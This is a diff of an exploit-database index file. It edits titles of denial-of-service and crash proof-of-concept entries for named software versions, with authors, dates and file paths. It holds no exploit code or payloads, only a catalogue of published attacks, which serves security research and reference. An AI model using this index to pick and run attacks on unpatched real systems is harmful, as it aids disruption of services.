24619,platforms/cgi/dos/24619.txt,"EmuLive Server4 - Authentication Bypass / Denial of Service",2004-09-21,"James Bercegay",cgi,dos,0 @@ -3388,7 +3388,7 @@ id,file,description,date,author,platform,type,port 25719,platforms/windows/dos/25719.txt,"Trend Micro DirectPass 1.5.0.1060 - Multiple Software Vulnerabilities",2013-05-26,Vulnerability-Lab,windows,dos,0 25736,platforms/hardware/dos/25736.txt,"Nokia 9500 - vCard Viewer Remote Denial of Service",2005-05-26,"Marek Bialoglowy",hardware,dos,0 25737,platforms/windows/dos/25737.txt,"Microsoft Windows 98SE - 'User32.dll' Icon Handling Denial of Service",2005-05-26,klistas,windows,dos,0 -25752,platforms/php/dos/25752.txt,"PHPMailer 1.7 - 'Data()' Function Remote Denial of Service",2005-05-28,"Mariano Nunez Di Croce",php,dos,0 +25752,platforms/php/dos/25752.txt,"PHPMailer 1.7 - 'Data()' Remote Denial of Service",2005-05-28,"Mariano Nunez Di Croce",php,dos,0 25757,platforms/multiple/dos/25757.txt,"Firefly Studios Stronghold 2 - Remote Denial of Service",2005-05-28,"Luigi Auriemma",multiple,dos,0 25782,platforms/windows/dos/25782.txt,"HP OpenView Radia 2.0/3.1/4.0 - Notify Daemon Multiple Remote Buffer Overflow Vulnerabilities",2005-06-01,"John Cartwright",windows,dos,0 25791,platforms/multiple/dos/25791.txt,"Rakkarsoft RakNet 2.33 - Remote Denial of Service",2005-06-06,"Luigi Auriemma",multiple,dos,0 @@ -3543,7 +3543,7 @@ id,file,description,date,author,platform,type,port 27670,platforms/linux/dos/27670.txt,"Xine 0.9/1.0 - Playlist Handling Remote Format String",2006-04-18,c0ntexb,linux,dos,0 27700,platforms/windows/dos/27700.py,"VideoLAN VLC Media Player 2.0.8 - '.m3u' Local Crash (PoC)",2013-08-19,Asesino04,windows,dos,0 27714,platforms/osx/dos/27714.txt,"Apple Mac OSX 10.x - LZWDecodeVector (.tiff) Overflow",2006-04-20,"Tom Ferris",osx,dos,0 -27715,platforms/osx/dos/27715.txt,"Apple Mac OSX 10.x - '.zip' Parsing 'BOMStackPop()' Function Overflow",2006-04-20,"Tom Ferris",osx,dos,0 +27715,platforms/osx/dos/27715.txt,"Apple Mac OSX 10.x - '.zip' BOMStackPop()' Overflow",2006-04-20,"Tom Ferris",osx,dos,0 27723,platforms/linux/dos/27723.txt,"Yukihiro Matsumoto Ruby 1.x - XMLRPC Server Denial of Service",2006-04-21,"Tanaka Akira",linux,dos,0 27730,platforms/multiple/dos/27730.py,"Lotus Domino 7.0.x/8.0/8.5 - LDAP Message Remote Denial of Service",2006-04-24,"Evgeny Legerov",multiple,dos,0 27745,platforms/windows/dos/27745.txt,"Outlook Express 5.5/6.0 / Windows Mail - MHTML URI Handler Information Disclosure",2006-04-27,codedreamer,windows,dos,0 @@ -3657,7 +3657,7 @@ id,file,description,date,author,platform,type,port 28726,platforms/multiple/dos/28726.pl,"OpenSSL SSLv2 - Null Pointer Dereference Client Denial of Service",2006-09-28,"Noam Rathaus",multiple,dos,0 28679,platforms/multiple/dos/28679.txt,"Evince PDF Reader 2.32.0.145 (Windows) / 3.4.0 (Linux) - Denial of Service",2013-10-02,Deva,multiple,dos,0 28683,platforms/linux/dos/28683.txt,"HylaFAX+ 5.2.4 > 5.5.3 - Buffer Overflow",2013-10-02,"Dennis Jenkins",linux,dos,0 -28735,platforms/windows/dos/28735.pl,"MailEnable 2.x - SMTP NTLM Authentication - Multiple Vulnerabilities",2006-11-29,mu-b,windows,dos,0 +28735,platforms/windows/dos/28735.pl,"MailEnable 2.x - SMTP NTLM Authentication Multiple Vulnerabilities",2006-11-29,mu-b,windows,dos,0 28739,platforms/hardware/dos/28739.pl,"Motorola SB4200 - Remote Denial of Service",2006-10-03,"Dave Gil",hardware,dos,0 28775,platforms/linux/dos/28775.pl,"Zabbix 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities",2006-10-09,"Max Vozeler",linux,dos,0 28785,platforms/windows/dos/28785.c,"Google Earth 4.0.2091 (Beta) - '.KML'/'.KMZ' Buffer Overflow",2006-09-14,JAAScois,windows,dos,0 @@ -3693,7 +3693,7 @@ id,file,description,date,author,platform,type,port 29229,platforms/windows/dos/29229.txt,"Microsoft Internet Explorer 6 - Frame Src Denial of Service",2006-12-05,"Juan Pablo Lopez",windows,dos,0 29236,platforms/windows/dos/29236.html,"Microsoft Internet Explorer 7 - CSS Width Element Denial of Service",2006-12-06,xiam.core,windows,dos,0 29285,platforms/windows/dos/29285.txt,"Microsoft Windows Media Player 6.4/10.0 - MID Malformed Header Chunk Denial of Service",2006-12-15,shinnai,windows,dos,0 -29286,platforms/windows/dos/29286.txt,"Microsoft Windows Explorer - 'explorer.exe' '.WMV' File Handling Denial of Service",2006-12-15,shinnai,windows,dos,0 +29286,platforms/windows/dos/29286.txt,"Microsoft Windows Explorer - 'explorer.exe .WMV' File Handling Denial of Service",2006-12-15,shinnai,windows,dos,0 29287,platforms/windows/dos/29287.txt,"Multiple Vendor Firewall - HIPS Process Spoofing",2006-12-15,"Matousec Transparent security",windows,dos,0 29295,platforms/windows/dos/29295.html,"Microsoft Outlook - ActiveX Control Remote Internet Explorer Denial of Service",2006-12-18,shinnai,windows,dos,0 29296,platforms/linux/dos/29296.txt,"KDE LibkHTML 4.2 - NodeType Function Denial of Service",2006-12-19,"Federico L. Bossi Bonin",linux,dos,0 @@ -3936,7 +3936,7 @@ id,file,description,date,author,platform,type,port 31306,platforms/hardware/dos/31306.txt,"Nortel UNIStim IP Phone - Remote Ping Denial of Service",2008-02-26,sipherr,hardware,dos,0 31307,platforms/android/dos/31307.py,"Google Android Web Browser - '.GIF' File Heap Based Buffer Overflow",2008-03-04,"Alfredo Ortega",android,dos,0 31168,platforms/windows/dos/31168.pl,"NCH Software Express Burn Plus 4.68 - '.EBP' Project File Buffer Overflow",2014-01-24,LiquidWorm,windows,dos,0 -31176,platforms/windows/dos/31176.html,"MW6 Technologies Aztec - ActiveX 'Data Pparameter Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 +31176,platforms/windows/dos/31176.html,"MW6 Technologies Aztec - ActiveX 'Data' Parameter Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 31177,platforms/windows/dos/31177.html,"MW6 Technologies Datamatrix - ActiveX 'Data' Parameter Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 31178,platforms/windows/dos/31178.html,"MW6 Technologies MaxiCode - ActiveX 'Data' Parameter Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 31305,platforms/linux/dos/31305.c,"Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat (PoC)",2014-01-31,"Kees Cook",linux,dos,0 @@ -3980,7 +3980,7 @@ id,file,description,date,author,platform,type,port 31522,platforms/windows/dos/31522.py,"OneHTTPD 0.8 - Crash (PoC)",2014-02-08,"Mahmod Mahajna (Mahy)",windows,dos,80 31542,platforms/multiple/dos/31542.txt,"IBM solidDB 6.0.10 - Format String / Denial of Service",2008-03-26,"Luigi Auriemma",multiple,dos,0 31984,platforms/linux/dos/31984.txt,"Mozilla Firefox 3.0 - '.JPEG' File Denial of Service",2008-06-27,"Beenu Arora",linux,dos,0 -31550,platforms/bsd/dos/31550.c,"Multiple BSD Distributions - 'strfmon()' Function Integer Overflow",2008-03-27,"Maksymilian Arciemowicz",bsd,dos,0 +31550,platforms/bsd/dos/31550.c,"Multiple BSD Distributions - 'strfmon()' Integer Overflow",2008-03-27,"Maksymilian Arciemowicz",bsd,dos,0 31552,platforms/linux/dos/31552.txt,"Wireshark 0.99.8 - X.509sat Dissector Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0 31553,platforms/linux/dos/31553.txt,"Wireshark 0.99.8 - LDAP Dissector Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0 31554,platforms/linux/dos/31554.txt,"Wireshark 0.99.8 - SCCP Dissector Decode As Feature Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0 @@ -4016,8 +4016,8 @@ id,file,description,date,author,platform,type,port 31819,platforms/windows/dos/31819.pl,"vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)",2008-05-21,"Praveen Darshanam",windows,dos,0 31856,platforms/windows/dos/31856.html,"CA Internet Security Suite - 'UmxEventCli.dll' ActiveX Control Arbitrary File Overwrite",2008-05-28,Nine:Situations:Group,windows,dos,0 31872,platforms/multiple/dos/31872.py,"NASA Ames Research Center BigView 1.8 - '.PNM' Stack Based Buffer Overflow",2008-06-04,"Alfredo Ortega",multiple,dos,0 -31876,platforms/windows/dos/31876.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'StartApp' ActiveX Control Insecure Method",2008-06-03,"Dennis Rand",windows,dos,0 -31877,platforms/windows/dos/31877.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'RegistryString' Buffer Overflow",2008-06-04,"Dennis Rand",windows,dos,0 +31876,platforms/windows/dos/31876.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll StartApp' ActiveX Control Insecure Method",2008-06-03,"Dennis Rand",windows,dos,0 +31877,platforms/windows/dos/31877.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll RegistryString' Buffer Overflow",2008-06-04,"Dennis Rand",windows,dos,0 31878,platforms/windows/dos/31878.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' ActiveX Control Arbitrary File Creation",2008-06-03,"Dennis Rand",windows,dos,0 31879,platforms/windows/dos/31879.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' ActiveX Control Arbitrary File Delete",2008-06-03,"Dennis Rand",windows,dos,0 31884,platforms/hardware/dos/31884.txt,"Linksys WRH54G 1.1.3 Wireless-G Router - HTTP Request Denial of Service",2008-06-05,dubingyao,hardware,dos,0 @@ -4072,7 +4072,7 @@ id,file,description,date,author,platform,type,port 32329,platforms/windows/dos/32329.rb,"Gold MP4 Player 3.3 - Universal Exploit (SEH) (Metasploit)",2014-03-17,"Revin Hadi Saputra",windows,dos,0 32333,platforms/ios/dos/32333.txt,"iOS 7 - Kernel Mode Memory Corruption",2014-03-17,"Andy Davis",ios,dos,0 32335,platforms/multiple/dos/32335.js,"Google Chrome 0.2.149 - Malformed 'view-source' HTTP Header Remote Denial of Service",2008-09-05,"Juan Pablo Lopez Yacubian",multiple,dos,0 -32341,platforms/hardware/dos/32341.html,"Apple iOS 1.1.4/2.0 / iPod 1.1.4/2.0 touch Safari WebKit - 'alert()' Function Remote Denial of Service",2008-09-12,"Nicolas Economou",hardware,dos,0 +32341,platforms/hardware/dos/32341.html,"Apple iOS 1.1.4/2.0 / iPod 1.1.4/2.0 touch Safari WebKit - 'alert()' Remote Denial of Service",2008-09-12,"Nicolas Economou",hardware,dos,0 32348,platforms/linux/dos/32348.txt,"MySQL 6.0.4 - Empty Binary String Literal Remote Denial of Service",2008-03-28,"Kay Roepke",linux,dos,0 32350,platforms/windows/dos/32350.txt,"Apple Bonjour for Windows 1.0.4 - mDNSResponder Null Pointer Dereference Denial of Service",2008-09-09,"Mario Ballano Bárcena",windows,dos,0 32356,platforms/windows/dos/32356.txt,"ZoneAlarm Security Suite 7.0 - AntiVirus Directory Path Buffer Overflow",2008-09-11,"Juan Pablo Lopez Yacubian",windows,dos,0 @@ -4086,7 +4086,7 @@ id,file,description,date,author,platform,type,port 32451,platforms/linux/dos/32451.txt,"Linux Kernel (Fedora 8/9) - 'utrace_control' Null Pointer Dereference Denial of Service",2008-10-02,"Michael Simms",linux,dos,0 32452,platforms/linux/dos/32452.txt,"Adobe Flash Player 9/10 - SWF Version Null Pointer Dereference Denial of Service",2008-10-02,"Matthew Dempsky",linux,dos,0 32454,platforms/unix/dos/32454.xml,"libxml2 - Denial of Service",2008-10-02,"Christian Weiske",unix,dos,0 -32471,platforms/linux/dos/32471.txt,"KDE Konqueror 3.5.9 - JavaScript 'load' Function Denial of Service",2008-10-10,"Jeremy Brown",linux,dos,0 +32471,platforms/linux/dos/32471.txt,"KDE Konqueror 3.5.9 - JavaScript 'load' Denial of Service",2008-10-10,"Jeremy Brown",linux,dos,0 32472,platforms/hardware/dos/32472.txt,"Nokia Web Browser for S60 - Infinite Array Sort Denial of Service",2008-10-10,"Luca Carettoni",hardware,dos,0 32477,platforms/windows/dos/32477.py,"Microsoft Windows Media Player 11.0.5721.5230 - Memory Corruption (PoC)",2014-03-24,"TUNISIAN CYBER",windows,dos,0 32478,platforms/windows/dos/32478.py,"jetVideo 8.1.1 - Basic '.wav' Local Crash (PoC)",2014-03-24,"TUNISIAN CYBER",windows,dos,0 @@ -4209,7 +4209,7 @@ id,file,description,date,author,platform,type,port 33224,platforms/linux/dos/33224.txt,"Wireshark 1.2.1 - GSM A RR Dissector packet.c Unspecified Remote Denial of Service",2009-09-15,"Buildbot Builder",linux,dos,0 33225,platforms/windows/dos/33225.html,"EasyMail Objects 6.0.2.0 - 'emimap4.dll' ActiveX Control Remote Code Execution",2009-09-15,"Francis Provencher",windows,dos,0 33228,platforms/linux/dos/33228.txt,"Linux Kernel 2.6.31 - 'perf_counter_open()' Local Buffer Overflow",2009-09-16,"Xiao Guangrong",linux,dos,0 -33230,platforms/linux/dos/33230.txt,"GNU glibc 2.x - 'strfmon()' Function Integer Overflow",2009-09-17,"Maksymilian Arciemowicz",linux,dos,0 +33230,platforms/linux/dos/33230.txt,"GNU glibc 2.x - 'strfmon()' Integer Overflow",2009-09-17,"Maksymilian Arciemowicz",linux,dos,0 33233,platforms/linux/dos/33233.txt,"FFmpeg 0.5 - Multiple Remote Vulnerabilities",2009-09-21,"Will Dormann",linux,dos,0 33235,platforms/osx/dos/33235.rb,"Apple iTunes 9.0 - '.pls' Buffer Overflow",2009-09-22,"Roger Hart",osx,dos,0 33710,platforms/windows/dos/33710.txt,"J. River Media Jukebox 12 - '.mp3' Remote Heap Buffer Overflow",2010-03-04,"Gjoko Krstic",windows,dos,0 @@ -4233,7 +4233,7 @@ id,file,description,date,author,platform,type,port 33386,platforms/multiple/dos/33386.html,"Mozilla Firefox 29.0 - Null Pointer Dereference",2014-05-16,Mr.XHat,multiple,dos,0 33397,platforms/linux/dos/33397.txt,"MySQL 6.0.9 - SELECT Statement WHERE Clause Sub-query Denial of Service",2009-11-23,"Shane Bester",linux,dos,0 33398,platforms/linux/dos/33398.txt,"MySQL 6.0.9 - 'GeomFromWKB()' Function First Argument Geometry Value Handling Denial of Service",2009-11-23,"Shane Bester",linux,dos,0 -33472,platforms/multiple/dos/33472.py,"Sun Java System Web Server 6.1/7.0 - HTTP 'TRACE' Heap Buffer Overflow",2010-01-06,"Evgeny Legerov",multiple,dos,0 +33472,platforms/multiple/dos/33472.py,"Sun Java System Web Server 6.1/7.0 - 'TRACE' Heap Buffer Overflow",2010-01-06,"Evgeny Legerov",multiple,dos,0 33479,platforms/osx/dos/33479.c,"Apple Mac OSX 10.x - 'libc/strtod(3)' Memory Corruption",2010-01-08,"Maksymilian Arciemowicz",osx,dos,0 33480,platforms/linux/dos/33480.txt,"MATLAB R2009b - 'dtoa' Implementation Memory Corruption",2010-01-08,"Maksymilian Arciemowicz",linux,dos,0 33483,platforms/multiple/dos/33483.py,"Sun Java System Directory Server 7.0 - 'core_get_proxyauth_dn' Denial of Service",2010-01-10,Intevydis,multiple,dos,0 @@ -4258,7 +4258,7 @@ id,file,description,date,author,platform,type,port 33587,platforms/windows/dos/33587.html,"Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero",2014-05-30,"Pawel Wylecial",windows,dos,0 33607,platforms/multiple/dos/33607.html,"Mozilla Firefox 3.5.x and SeaMonkey 2.0.1 - Remote Denial of Service",2010-02-07,"599eme Man",multiple,dos,0 33608,platforms/windows/dos/33608.html,"Apple Safari 4.0.4 - Remote Denial of Service",2010-02-07,"599eme Man",windows,dos,0 -33625,platforms/php/dos/33625.php,"PHP 5.3.1 - 'session_save_path()' 'Safe_mode()' Restriction Bypass Exploiot",2010-02-11,"Grzegorz Stachowiak",php,dos,0 +33625,platforms/php/dos/33625.php,"PHP 5.3.1 - 'session_save_path() Safe_mode()' Restriction Bypass Exploiot",2010-02-11,"Grzegorz Stachowiak",php,dos,0 33713,platforms/windows/dos/33713.py,"Core FTP LE 2.2 - Heap Overflow (PoC)",2014-06-11,"Gabor Seljan",windows,dos,0 33677,platforms/php/dos/33677.txt,"PHP 5.3.1 - LCG Entropy Security",2010-02-26,Rasmus,php,dos,0 33672,platforms/linux/dos/33672.txt,"Kojoney 0.0.4.1 - 'urllib.urlopen()' Remote Denial of Service",2010-02-24,Nicob,linux,dos,0 @@ -4266,7 +4266,7 @@ id,file,description,date,author,platform,type,port 33708,platforms/bsd/dos/33708.c,"FreeBSD 8.0 / OpenBSD 4.x - 'ftpd' Null Pointer Dereference Denial of Service",2010-03-05,kingcope,bsd,dos,0 33838,platforms/windows/dos/33838.py,"Mocha W32 LPD 1.9 - Remote Buffer Overflow",2010-04-15,mr_me,windows,dos,0 33711,platforms/windows/dos/33711.txt,"BS.Player 2.51 - '.mp3' Buffer Overflow",2010-03-05,"Gjoko Krstic",windows,dos,0 -33719,platforms/windows/dos/33719.py,"Microsoft Windows XP/Vista - '.ani' 'tagBITMAPINFOHEADER' Denial of Service",2010-03-08,Skylined,windows,dos,0 +33719,platforms/windows/dos/33719.py,"Microsoft Windows XP/Vista - '.ani tagBITMAPINFOHEADER' Denial of Service",2010-03-08,Skylined,windows,dos,0 33729,platforms/multiple/dos/33729.txt,"PostgreSQL 8.4.1 - JOIN Hashtable Size Integer Overflow Denial of Service",2014-06-13,"Bernt Marius Johnsen",multiple,dos,0 33733,platforms/windows/dos/33733.pl,"httpdx 1.5.3 - '.png' File Handling Remote Denial of Service",2010-03-10,"Jonathan Salwan",windows,dos,0 33735,platforms/multiple/dos/33735.txt,"SUPERAntiSpyware 4.34.1000 and SuperAdBlocker 4.6.1000 - Multiple Vulnerabilities",2010-03-10,"Luka Milkovic",multiple,dos,0 @@ -4395,7 +4395,7 @@ id,file,description,date,author,platform,type,port 35158,platforms/windows/dos/35158.py,"Mongoose 2.11 - 'Content-Length' HTTP Header Remote Denial of Service",2010-12-27,JohnLeitch,windows,dos,0 35162,platforms/linux/dos/35162.cob,"GIMP 2.6.7 - Multiple File Plugins Remote Stack Buffer Overflow Vulnerabilities",2010-12-31,"non customers",linux,dos,0 35163,platforms/windows/dos/35163.c,"ImgBurn 2.4 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2011-01-01,d3c0der,windows,dos,0 -35164,platforms/php/dos/35164.php,"PHP 5.3.2 - 'zend_strtod()' Function Floating-Point Value Denial of Service",2011-01-03,"Rick Regan",php,dos,0 +35164,platforms/php/dos/35164.php,"PHP 5.3.2 - 'zend_strtod()' Floating-Point Value Denial of Service",2011-01-03,"Rick Regan",php,dos,0 35173,platforms/linux/dos/35173.txt,"Minix 3.3.0 - Local Denial of Service (PoC)",2014-11-06,nitr0us,linux,dos,0 35178,platforms/windows/dos/35178.py,"i.Hex 0.98 - Local Crash (PoC)",2014-11-06,metacom,windows,dos,0 35179,platforms/windows/dos/35179.py,"i.Mage 1.11 - Local Crash (PoC)",2014-11-06,metacom,windows,dos,0 @@ -4428,12 +4428,12 @@ id,file,description,date,author,platform,type,port 35445,platforms/linux/dos/35445.txt,"OpenLDAP 2.4.x - 'modrdn' NULL OldDN Remote Denial of Service",2011-01-03,"Serge Dubrouski",linux,dos,0 35465,platforms/multiple/dos/35465.pl,"VideoLAN VLC Media Player 1.0.5 - '.ape' Denial of Service",2011-03-15,KedAns-Dz,multiple,dos,0 35478,platforms/linux/dos/35478.txt,"MHonArc 2.6.16 - Tag Nesting Remote Denial of Service",2010-12-21,anonymous,linux,dos,0 -35483,platforms/php/dos/35483.txt,"PHP 5.3.x 'Intl' Extension - 'NumberFormatter::setSymbol()' Function Denial of Service",2011-03-10,thoger,php,dos,0 -35484,platforms/php/dos/35484.php,"PHP 5.3.x 'Zip' Extension - 'stream_get_contents()' Function Denial of Service",2011-03-10,paulgao,php,dos,0 -35485,platforms/php/dos/35485.php,"PHP < 5.3.6 'Zip' Extension - 'zip_fread()' Function Denial of Service",2011-03-10,TorokAlpar,php,dos,0 -35486,platforms/php/dos/35486.php,"PHP < 5.3.6 'OpenSSL' Extension - 'openssl_encrypt' Function Plaintext Data Memory Leak Denial of Service",2011-03-08,dovbysh,php,dos,0 -35487,platforms/php/dos/35487.php,"PHP < 5.3.6 'OpenSSL' Extension - 'openssl_decrypt' Function Ciphertext Data Memory Leak Denial of Service",2011-03-08,dovbysh,php,dos,0 -35489,platforms/multiple/dos/35489.pl,"Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0 +35483,platforms/php/dos/35483.txt,"PHP 5.3.x 'Intl' Extension - 'NumberFormatter::setSymbol()' Denial of Service",2011-03-10,thoger,php,dos,0 +35484,platforms/php/dos/35484.php,"PHP 5.3.x 'Zip' Extension - 'stream_get_contents()' Denial of Service",2011-03-10,paulgao,php,dos,0 +35485,platforms/php/dos/35485.php,"PHP < 5.3.6 'Zip' Extension - 'zip_fread()' Denial of Service",2011-03-10,TorokAlpar,php,dos,0 +35486,platforms/php/dos/35486.php,"PHP < 5.3.6 'OpenSSL' Extension - 'openssl_encrypt' Plaintext Data Memory Leak Denial of Service",2011-03-08,dovbysh,php,dos,0 +35487,platforms/php/dos/35487.php,"PHP < 5.3.6 'OpenSSL' Extension - 'openssl_decrypt' Ciphertext Data Memory Leak Denial of Service",2011-03-08,dovbysh,php,dos,0 +35489,platforms/multiple/dos/35489.pl,"Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Remote Denial of Service",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0 35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 - Denial of Service",2011-03-27,KedAns-Dz,windows,dos,0 35507,platforms/windows/dos/35507.pl,"DivX Player 7 - Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0 35530,platforms/windows/dos/35530.py,"Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (SEH) (Denial of Service)",2014-12-15,s-dz,windows,dos,0 @@ -4452,10 +4452,10 @@ id,file,description,date,author,platform,type,port 35725,platforms/multiple/dos/35725.pl,"Perl 5.10 - Multiple Null Pointer Dereference Denial of Service Vulnerabilities",2011-05-03,"Jonathan Brossard",multiple,dos,0 35738,platforms/linux/dos/35738.php,"Apache 1.4/2.2.x - APR 'apr_fnmatch()' Denial of Service",2011-05-12,"Maksymilian Arciemowicz",linux,dos,0 35753,platforms/multiple/dos/35753.pl,"Novell eDirectory 8.8 and Netware LDAP-SSL Daemon - Denial of Service",2011-05-16,Knud,multiple,dos,0 -35771,platforms/osx/dos/35771.c,"Apple Mac OSX 10.10 - BlueTooth DispatchHCICreateConnection - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0 -35772,platforms/osx/dos/35772.c,"Apple Mac OSX 10.10 - BlueTooth BlueToothHCIChangeLocalName - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0 -35773,platforms/osx/dos/35773.c,"Apple Mac OSX 10.10 - BlueTooth TransferACLPacketToHW - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0 -35774,platforms/osx/dos/35774.c,"Apple Mac OSX 10.10 - BlueTooth DispatchHCIWriteStoredLinkKey - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0 +35771,platforms/osx/dos/35771.c,"Apple Mac OSX 10.10 - BlueTooth DispatchHCICreateConnection Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0 +35772,platforms/osx/dos/35772.c,"Apple Mac OSX 10.10 - BlueTooth BlueToothHCIChangeLocalName Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0 +35773,platforms/osx/dos/35773.c,"Apple Mac OSX 10.10 - BlueTooth TransferACLPacketToHW Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0 +35774,platforms/osx/dos/35774.c,"Apple Mac OSX 10.10 - BlueTooth DispatchHCIWriteStoredLinkKey Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0 35804,platforms/windows/dos/35804.txt,"NetVault: SmartDisk 1.2 - 'libnvbasics.dll' Remote Denial of Service",2011-05-28,"Luigi Auriemma",windows,dos,0 35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x - KSM Local Denial of Service",2011-06-02,"Andrea Righi",linux,dos,0 35827,platforms/windows/dos/35827.py,"JetAudio 8.1.3 - '.mp4' Crash (PoC)",2014-12-12,"Drozdova Liudmila",windows,dos,0 @@ -4504,7 +4504,7 @@ id,file,description,date,author,platform,type,port 36335,platforms/windows/dos/36335.txt,"Foxit Products GIF Conversion - Memory Corruption (DataSubBlock)",2015-03-11,"Francis Provencher",windows,dos,0 36336,platforms/windows/dos/36336.txt,"Microsoft Windows - Text Services Memory Corruption (MS15-020)",2015-03-11,"Francis Provencher",windows,dos,0 36361,platforms/windows/dos/36361.py,"Titan FTP Server 8.40 - 'APPE' Command Remote Denial of Service",2011-11-25,"Houssam Sahli",windows,dos,0 -36377,platforms/multiple/dos/36377.txt,"CoDeSys 3.4 - HTTP POST Null Pointer Content-Length Parsing Remote Denial of Service",2011-11-30,"Luigi Auriemma",multiple,dos,0 +36377,platforms/multiple/dos/36377.txt,"CoDeSys 3.4 - POST Null Pointer Content-Length Parsing Remote Denial of Service",2011-11-30,"Luigi Auriemma",multiple,dos,0 36378,platforms/multiple/dos/36378.txt,"CoDeSys 3.4 - Null Pointer Invalid HTTP Request Parsing Remote Denial of Service",2011-11-30,"Luigi Auriemma",multiple,dos,0 36405,platforms/windows/dos/36405.txt,"Serv-U FTP Server 11.1.0.3 - Denial of Service / Security Bypass",2011-12-05,"Luigi Auriemma",windows,dos,0 36388,platforms/linux/dos/36388.py,"Brasero CD/DVD Burner 3.4.1 - '.m3u' Buffer Overflow Crash (PoC)",2015-03-16,"Avinash Thapa",linux,dos,0 @@ -4686,13 +4686,13 @@ id,file,description,date,author,platform,type,port 37913,platforms/windows/dos/37913.txt,"Microsoft Office 2007 - 'mso.dll' Use-After-Free (MS15-081)",2015-08-21,"Google Security Research",windows,dos,0 37914,platforms/windows/dos/37914.txt,"Microsoft Windows - 'win32k.sys' TTF Font Processing win32k!fsc_BLTHoriz Out-of-Bounds Pool Write",2015-08-21,"Google Security Research",windows,dos,0 37915,platforms/windows/dos/37915.txt,"Microsoft Windows - 'win32k.sys' TTF Font Processing win32k!fsc_RemoveDups Out-of-Bounds Pool Memory Access",2015-08-21,"Google Security Research",windows,dos,0 -37916,platforms/windows/dos/37916.txt,"Microsoft Windows - 'ATMFD.DLL' Out-of-Bounds Read Due to - Malformed FDSelect Offset in the CFF Table",2015-08-21,"Google Security Research",windows,dos,0 -37917,platforms/windows/dos/37917.txt,"Microsoft Windows - 'ATMFD.DLL' Out-of-Bounds Read Due to - Malformed Name INDEX in the CFF Table",2015-08-21,"Google Security Research",windows,dos,0 +37916,platforms/windows/dos/37916.txt,"Microsoft Windows - 'ATMFD.DLL' Out-of-Bounds Read Due to Malformed FDSelect Offset in the CFF Table",2015-08-21,"Google Security Research",windows,dos,0 +37917,platforms/windows/dos/37917.txt,"Microsoft Windows - 'ATMFD.DLL' Out-of-Bounds Read Due to Malformed Name INDEX in the CFF Table",2015-08-21,"Google Security Research",windows,dos,0 37918,platforms/windows/dos/37918.txt,"Microsoft Windows - 'win32k.sys' TTF Font Processing win32k!scl_ApplyTranslation Pool-Based Buffer Overflow",2015-08-21,"Google Security Research",windows,dos,0 37919,platforms/windows/dos/37919.txt,"Microsoft Windows - 'win32k.sys' TTF Font Processing IUP[] Program Instruction Pool-Based Buffer Overflow",2015-08-21,"Google Security Research",windows,dos,0 -37920,platforms/windows/dos/37920.txt,"Microsoft Windows - 'ATMFD.DLL' Write to Uninitialized Address Due to - Malformed CFF Table",2015-08-21,"Google Security Research",windows,dos,0 +37920,platforms/windows/dos/37920.txt,"Microsoft Windows - 'ATMFD.DLL' Write to Uninitialized Address Due to Malformed CFF Table",2015-08-21,"Google Security Research",windows,dos,0 37921,platforms/windows/dos/37921.txt,"Microsoft Windows - 'ATMFD.dll' CFF table (ATMFD+0x3440b / ATMFD+0x3440e) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0 -37922,platforms/windows/dos/37922.txt,"Microsoft Windows - 'ATMFD.DLL' CFF table (ATMFD+0x34072 - / ATMFD+0x3407b) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0 +37922,platforms/windows/dos/37922.txt,"Microsoft Windows - 'ATMFD.DLL' CFF table (ATMFD+0x34072 / ATMFD+0x3407b) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0 37923,platforms/windows/dos/37923.txt,"Microsoft Windows - 'ATMFD.dll' CharString Stream Out-of-Bounds Reads (MS15-021)",2015-08-21,"Google Security Research",windows,dos,0 37924,platforms/windows/dos/37924.txt,"Microsoft Office 2007 - MSPTLS Heap Index Integer Underflow (MS15-081)",2015-08-21,"Google Security Research",windows,dos,0 37954,platforms/windows/dos/37954.py,"Mock SMTP Server 1.0 - Remote Crash (PoC)",2015-08-24,"Shankar Damodaran",windows,dos,25 @@ -4730,7 +4730,7 @@ id,file,description,date,author,platform,type,port 38146,platforms/windows/dos/38146.html,"Microsoft Internet Explorer 11 - Stack Underflow Crash (PoC)",2015-09-11,Mjx,windows,dos,0 38165,platforms/windows/dos/38165.txt,"IKEView.exe Fox Beta 1 - Stack Buffer Overflow",2015-09-13,hyp3rlinx,windows,dos,0 